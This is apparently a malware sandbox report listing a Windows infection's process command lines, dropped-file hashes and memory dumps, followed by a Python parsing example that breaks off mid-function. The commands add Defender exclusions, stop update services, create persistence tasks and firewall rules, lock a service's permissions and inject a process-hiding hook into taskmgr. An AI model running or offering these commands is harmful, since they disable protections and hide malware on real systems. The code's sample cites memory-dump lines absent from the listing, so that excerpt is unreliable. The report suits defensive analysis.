icacls "C:\Users\Admin\AppData\Local\cbaeabda-55b5-4251-a64f-9bc2c362aa5c" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\40DC.exe

"C:\Users\Admin\AppData\Local\Temp\40DC.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\40DC.exe

"C:\Users\Admin\AppData\Local\Temp\40DC.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4944 -ip 4944

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4944 -s 568

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\577f58beff" /P "Admin:R" /E

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\6042.exe

"C:\Users\Admin\AppData\Local\Temp\6042.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xulltjniharo.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xulltjniharo.xml"

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\40DC.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d

C:\Users\Admin\AppData\Local\Temp\44D5.exe

MD5 77f6f0504e40c95483da601ee1de4a4e
SHA1 628094e713d9f970b63091f6dec44f8feb6e26b2
SHA256 ad6a9a78ad3c6dceb908df1a46665b85c91888b4915fd514c0305048d8e8c111
SHA512 7e01b7917d61054360ef451a0a4a4be856e04bda77082fd63beae43e345af61c10d11f64021182913f74248b41b037a40d83e9cb6f2897a99001591bd2595b63

C:\Users\Admin\AppData\Local\Temp\4812.dll

MD5 a43d9991721fcd1521677bf31c21ce21
SHA1 0e86179bdcf8685b9bd7da13cd9aa10218f0d81c
SHA256 6561ae7f88e51c053e856b98418192ff7aa85a4f7a16460fb769073fe4535197
SHA512 233bf239b73e9b398d2666ab21cd3ecf930b98c935cbe5e7d5f325fb8bdb9b7ec064a4aecc73228fbb9c35a9f0dd1503e2f66b6f18e5931d0f4567fc2dc02459

C:\Users\Admin\AppData\Local\Temp\497B.exe

MD5 9a31a97c4280c2f132874184bc1864eb
SHA1 424f3577733ecdf081cff3c0b765668fa94bf106
SHA256 d50a823a85ebd19a7e61abd091d90b5735c78a4f9f0f32f99c05846c2be45681
SHA512 01facbb50b5cc39e2f91f79e0c3b0448a5804650459c06ee1287f587376df474b30348d825efc8ea6fe2773762db5cad328dc07df53c1273208692d4662dd87c

C:\Users\Admin\AppData\Local\Temp\517A.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\566D.exe

MD5 a6cc2635415872e2cfa5bc586b8d5ac1
SHA1 1ab7f97be976876998982fef5a4f54f29325ff10
SHA256 2c7f187a9372f97c7cb6cdc8143a832d2790188bf194f251460ac990b9074d5e
SHA512 cdf59bea2bfc872b8b39d5553c9b91292afcd73e3c9bf7a95ce14734052e6718cbc6379358447b115dbd2967ad3bd933e135b7e7c40d98ddaca7f50c1ac0f7ad

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\6042.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Users\Admin\AppData\Local\cbaeabda-55b5-4251-a64f-9bc2c362aa5c\40DC.exe

MD5 3d0534c699f0f264c2ecedebb5cf3af8
SHA1 f0cb1804fe81dba82b085e51d64953a77dc5e174
SHA256 e4f573f8d774dce16cdd944525f599465be442656870081fb66f91dd2b7db230
SHA512 69d8c00bc663cea2c5deca5bdc24b59f1e82d5439676b9eb2a719902c273d5611c2cfc00b72c750411f06361b74ace3e8b16ae3c20a755418f5432479603b62d


memory/4996-191-0x0000000002CE0000-0x00000000030E8000-memory.dmp

memory/3712-196-0x0000000005C80000-0x0000000005C90000-memory.dmp

memory/940-195-0x0000000007620000-0x000000000765C000-memory.dmp

memory/3712-197-0x0000000076C30000-0x0000000076D20000-memory.dmp

memory/940-198-0x0000000007660000-0x00000000076AC000-memory.dmp

memory/1088-199-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/4996-193-0x00000000030F0000-0x00000000039DB000-memory.dmp

memory/3712-200-0x00000000008E0000-0x0000000001088000-memory.dmp

memory/940-188-0x00000000076B0000-0x00000000077BA000-memory.dmp

memory/1088-201-0x0000000007F00000-0x0000000007F10000-memory.dmp

memory/2112-163-0x00000000020F0000-0x000000000218B000-memory.dmp

memory/4996-202-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/1088-205-0x00000000088E0000-0x0000000008946000-memory.dmp

memory/4996-206-0x0000000000400000-0x0000000000D6F000-memory.dmp

memory/940-207-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/952-209-0x0000000005470000-0x0000000005480000-memory.dmp

memory/952-208-0x00000000735F0000-0x0000000073DA0000-memory.dmp

memory/952-210-0x00000000053E0000-0x0000000005416000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nihrsyua.ael.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Roaming\rdfuthe

MD5 a6cc2635415872e2cfa5bc586b8d5ac1
SHA1 1ab7f97be976876998982fef5a4f54f29325ff10
SHA256 2c7f187a9372f97c7cb6cdc8143a832d2790188bf194f251460ac990b9074d5e
SHA512 cdf59bea2bfc872b8b39d5553c9b91292afcd73e3c9bf7a95ce14734052e6718cbc6379358447b115dbd2967ad3bd933e135b7e7c40d98ddaca7f50c1ac0f7ad

memory/4996-262-0x0000000000400000-0x0000000000D6F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 b3b4060b6ca706ed5c0c50f603c8dd6e
SHA1 38ac281e1502d4da29bb852d3fbdce519ca78651
SHA256 12900fc1b9b68c29f56f01d75e68df2418672eb5f0464fea24f7fe041d7d2b09
SHA512 ca7e93b1fad41938ce146fbec7128d44dbdf3662ff866471cc315bef53561bdd8f3383584b45ed1705b37818c8df228d2fc2221fe7508dbd166a2fccdf1062ab

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 1b74622e8ab19add38f77108668ab0d3
SHA1 44f55fd86a7dac45ba9be3ccc93ca8506ac44971
SHA256 95c147385128ab72e7c19aeda013dae4cba31d6efafe74b7005638c3399e7bba
SHA512 abd4b99ccf7b7a94dd518f226ca20acc41879b89d07f1221b625be6bdbe1b664ab9cfcd8b7b7f80f23fa1fc8d1510f19196153d7701b3c79faa3fe230ae2ebde

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

MD5 c671d50d589ce7be9ad3ff4035e6ad63
SHA1 88cdc154077c8264149cb8b19e16ba07901e1dd6
SHA256 fb07948cb75ee2b9967b1a6386eb53a46573ae99c9ecb46f2b377af8df1b7568
SHA512 a40a7500a7896f2200754499c00e74a7b8a53578808d5408e1e31733d03cdeb2b3e520c1d9b71537f2877093b686811b8e20cbb5c8061e4d3e1d75a161cebae9

memory/1920-278-0x00007FF69A720000-0x00007FF69B900000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6042.exe

MD5 71b9cd84ec146c642e076dfb2a87c31a
SHA1 18f593471c238beb864de6425c0343cbb0ea8597
SHA256 19c9a046edef05ab14dcb86a46de9361190b07b0ef628771a00a36564192d309
SHA512 af8402aa35dc3f2fd112359c0a34187756e258f96f67775513b7df2ddaf0f0b7887f730b877ba16ccd8fa5f95f54a47355dacc226f5c6c5cdf2aa7b596a6872c

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 34e51362210c5e9637bdb3d79c1761a4
SHA1 e41e2665d0e167ef02fb6dfe1acf3f74ec7b7a22
SHA256 72e0ebc9aa037086f593593d065068d8d442a2ba31ee61ad44071edd9eec4f12
SHA512 8298476271fc8c28151e2b6d20512fd173e0bc442c9a6358cadb7bbfaa0e61e4c403b664de173f5de753a6b0ac52ad57dcfb26bfe21ad548204934835ca0f410

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 644cb78cc77fb14a04661ed8a7c3d196
SHA1 87b52f21c8cdf9cbb4929ffe220ad9ca0a337f8c
SHA256 d0bfdf475fa2de548707e2753d606bcd8c9ce5023f612cd20e6f49e2a46bcf3b
SHA512 6649ee7d70461dd5eb0a276b18bb19149e5ab488683d4f6db6dfd6dff299dd30602dc65eb20d9a7b36deb9b5a56062c71bd556077d41376c62c43a9f514d86f0

C:\Users\Admin\AppData\Local\Temp\xulltjniharo.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 88f5524e7db51aa117a84d205c254bab
SHA1 e95e54335687b4331d8930be520455cda5ca8269
SHA256 65ed690d585cfd413fc79e3a05eb87468b6d9c3929d887f537dbd86532cec4b8
SHA512 89a78a0d0b1d7f23a871cbb465a5f8d0d8a376b7e1998417d7448fb15601a0e0fede159e310870fd13b502cedfbd31a58073be6331918b67e9ccab5ce17fc93c

C:\Program Files\Google\Chrome\updater.exe

MD5 92be6def85e16d9c154b5d8829d615d6
SHA1 614a314b55831e15ad29ff46312f44ea1399ccac
SHA256 98fb516048c35cbe84d1a31536650f1caca5952702f0189c8f3f72a21a561b1d
SHA512 f09d0b4b4e4f1effa5f2735305fb4e1c95669d29b850b4f97e0e2b2688c4d077c2460e61feb50a68526f0a68aff2f5c24ad7deaa4a637703d301cae707f1bdd6

C:\Windows\rss\csrss.exe

MD5 a50ebdc8e7bb60a4686fffa9323ad61f
SHA1 1302b28d7cfb7eb2969678b1c02a44280f471666
SHA256 24053ca4496a6d4ed35da7d868cc912f583c268828f2d739ff93f41a0024d3e6
SHA512 270c34c8618b12bf50f18d75fa091642e32c47f72884b2dec24e939c415e1992c56223f17ebdfecedc1b4a5be3b2ff457d961aa300a2f8a722beef231ed5e806

C:\Windows\rss\csrss.exe

MD5 30ee18cdea6b54405adc18c511eb88e6
SHA1 935c00aebea3b21362fd7de3ef8b7b5b2a9b6438
SHA256 4f1c2f2b86b50e4bed35c9e6a31fd2dcfa57512c7bb951398913d61512e02901
SHA512 2b30087e1f057096b1b6a3c6d31d2d8d7fcfa3a65d5feb6d5c8bb1769116f260867090db5e43e54d800463e3a705c73669e909b10619eb6a6d4e936b97d30930

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 58f17ae0fe2534b1e3594e707f4e1223
SHA1 3c0c013546b7d64ad40aedb606f180b7007955ef
SHA256 46e547e7d26c48a3a4425cd8cb312ce1f3550e6bbfe02b00aa0d16b56010bab8
SHA512 8b3999b64e7e30f0b71428649df286b38bc7c447b303b593fa4283a7e8f29e1a8f8b7d1d74c1cb40a9f274a5c5174f2df14e302a1fc325125d6bf8302c17cce3

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 b54391da243b08c4a71dd8544328904a
SHA1 09e2353309a1c1afc870ea35e716658a0d24e61d
SHA256 ca6eb01f279ab508343bddd1a3590c997d44f6eef734d93632bb6008bcc16ef4
SHA512 dac13055d86207193adc8f1ad6b6328a9e9b8ca9dc5c63a57a18abb385741058d05870386b5bc9a0c71135d9c6123c695b937eaaf96399635f1470021b44386c

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 9d3d68839e55d7a29c96c908494381c4
SHA1 9722613339047420b3750e82f9383c472a98c2c0
SHA256 d1ed4a9d31729c487c183577e995404808950075ce678ede7bc59c885bed8932
SHA512 72c9925bd5ec65ac9555b32cba89a961414292be1f332eb9c1a23adff097b53bfaf569718188346e937be3e7f1e25b0d950a76359c87bcec2640aba24bae29fd

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Program Files\Google\Chrome\updater.exe

MD5 e4f1282f1ca878460ae7048c74841b7c
SHA1 6b468521447c316891b7e22dd5790e1526ea7934
SHA256 4b64bccaf78060bde8b10ffa688719d419f6730237a7328287e02435ad88a333
SHA512 35c95fdf45286f0d7021c91f160ae72ea26e57a344d0249e25b71f024003ceac74bac341d9e423ea5614bd24c87f3056d04d10cb6521c5234d434043f8204dde

C:\Windows\TEMP\xulltjniharo.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Windows\System32\drivers\etc\hosts

MD5 2d29fd3ae57f422e2b2121141dc82253
SHA1 c2464c857779c0ab4f5e766f5028fcc651a6c6b7
SHA256 80a60d7ec533d820de20bcedeb41319e7b1def548b6ea73ddbd69455bac4e7a4
SHA512 077a5c554663be7b71f181d961f5c98c732bc296dc015ffee30768a648bee3aad62c39c352cf2947432be19519906aeac7dfaf2557d309bb460732abb7fdbc68

C:\Windows\windefender.exe

MD5 ddb8715f6846ef241fa1dfb8e60e9743
SHA1 a818046c8fb726fbf9b1fce6b3d8d519159a78de
SHA256 e5da747d299dbde90d2bd9af07fa29c405f9b5b8648182ac6c5608c0c3a641c5
SHA512 3e21352add4afebd54939c095b74ce2ba19893e571c4dec619624620d597efebe7559423af3109d01bceaa61447052e3cd8c1b4aeb83629f68a4001c88f8fa7d

C:\Windows\windefender.exe

MD5 ddb8715f6846ef241fa1dfb8e60e9743
SHA1 a818046c8fb726fbf9b1fce6b3d8d519159a78de
SHA256 e5da747d299dbde90d2bd9af07fa29c405f9b5b8648182ac6c5608c0c3a641c5
SHA512 3e21352add4afebd54939c095b74ce2ba19893e571c4dec619624620d597efebe7559423af3109d01bceaa61447052e3cd8c1b4aeb83629f68a4001c88f8fa7d

C:\Windows\windefender.exe

MD5 c867a746868de73337e2ff276281b394
SHA1 718899329ae7a66b95d9f25d28ef543ed5bcc14a
SHA256 8017c1eef3bb8245af96b80eb7783b514a8961d9577c964ec23204509eb921e6
SHA512 c52adc2e410572db52f94b53a583e4f59c948db962591cb42e5ab28d24d3c5885b7cd76b2816b5f39bae2067286227a2ca0bc1fab8706abdf8bc59c22c251691
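The listing above is raw sandbox output: one entry per dropped file (a path followed by its MD5, SHA1, SHA256 and SHA512) or per dumped memory region (memory/<pid>-<n>-<start>-<end>-memory.dmp). The Python below is an added example, not part of the report or of any tool it names, that parses this layout into structured records and answers the questions an analyst usually has about such a list: which hashes to block, which paths were written more than once with different contents (mi.exe, csrss.exe, updater.exe and windefender.exe above each carry two or three distinct SHA256 values), which writes land outside the user profile, and which dumped region per PID is the largest. The layout rules and the two heuristics (rewritten path, system write) are my assumptions; the SAMPLE text is an excerpt of the listing above.

```python
"""Parse a sandbox 'Files' listing like the one above into structured IOCs.

Added example, not part of the report. Layout assumptions are mine: a dropped
file is a path line followed by MD5/SHA1/SHA256/SHA512 lines; a memory dump is
memory/<pid>-<n>-0x<start>-0x<end>-memory.dmp; blank lines are ignored.
"""
import re
from collections import defaultdict

MEM_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Excerpt of the listing above (same paths and digests, blank lines dropped).
SAMPLE = r"""
memory/4996-133-0x0000000000400000-0x0000000000D6F000-memory.dmp
memory/3712-150-0x0000000005C90000-0x0000000005CAC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mi.exe
MD5 b3b4060b6ca706ed5c0c50f603c8dd6e
SHA1 38ac281e1502d4da29bb852d3fbdce519ca78651
SHA256 12900fc1b9b68c29f56f01d75e68df2418672eb5f0464fea24f7fe041d7d2b09
SHA512 ca7e93b1fad41938ce146fbec7128d44dbdf3662ff866471cc315bef53561bdd8f3383584b45ed1705b37818c8df228d2fc2221fe7508dbd166a2fccdf1062ab
C:\Users\Admin\AppData\Local\Temp\mi.exe
MD5 1b74622e8ab19add38f77108668ab0d3
SHA1 44f55fd86a7dac45ba9be3ccc93ca8506ac44971
SHA256 95c147385128ab72e7c19aeda013dae4cba31d6efafe74b7005638c3399e7bba
SHA512 abd4b99ccf7b7a94dd518f226ca20acc41879b89d07f1221b625be6bdbe1b664ab9cfcd8b7b7f80f23fa1fc8d1510f19196153d7701b3c79faa3fe230ae2ebde
C:\Windows\windefender.exe
MD5 ddb8715f6846ef241fa1dfb8e60e9743
SHA1 a818046c8fb726fbf9b1fce6b3d8d519159a78de
SHA256 e5da747d299dbde90d2bd9af07fa29c405f9b5b8648182ac6c5608c0c3a641c5
SHA512 3e21352add4afebd54939c095b74ce2ba19893e571c4dec619624620d597efebe7559423af3109d01bceaa61447052e3cd8c1b4aeb83629f68a4001c88f8fa7d
C:\Windows\windefender.exe
MD5 ddb8715f6846ef241fa1dfb8e60e9743
SHA1 a818046c8fb726fbf9b1fce6b3d8d519159a78de
SHA256 e5da747d299dbde90d2bd9af07fa29c405f9b5b8648182ac6c5608c0c3a641c5
SHA512 3e21352add4afebd54939c095b74ce2ba19893e571c4dec619624620d597efebe7559423af3109d01bceaa61447052e3cd8c1b4aeb83629f68a4001c88f8fa7d
"""

def parse_listing(text):
    """Return (files, regions); duplicate file entries are kept on purpose."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            pid, idx, start, end = m.groups()
            start, end = int(start, 16), int(end, 16)
            regions.append({"pid": int(pid), "idx": int(idx), "start": start,
                            "end": end, "size": end - start})
            current = None
            continue
        h = HASH_RE.match(line)
        if h:
            if current is None:
                raise ValueError(f"hash line without a path: {line}")
            algo, digest = h.groups()
            if len(digest) != HASH_LEN[algo]:  # catch truncated or garbled digests
                raise ValueError(f"bad {algo} length for {current['path']}")
            current[algo] = digest
            continue
        current = {"path": line}  # anything else starts a new file entry
        files.append(current)
    return files, regions

def rewritten_paths(files):
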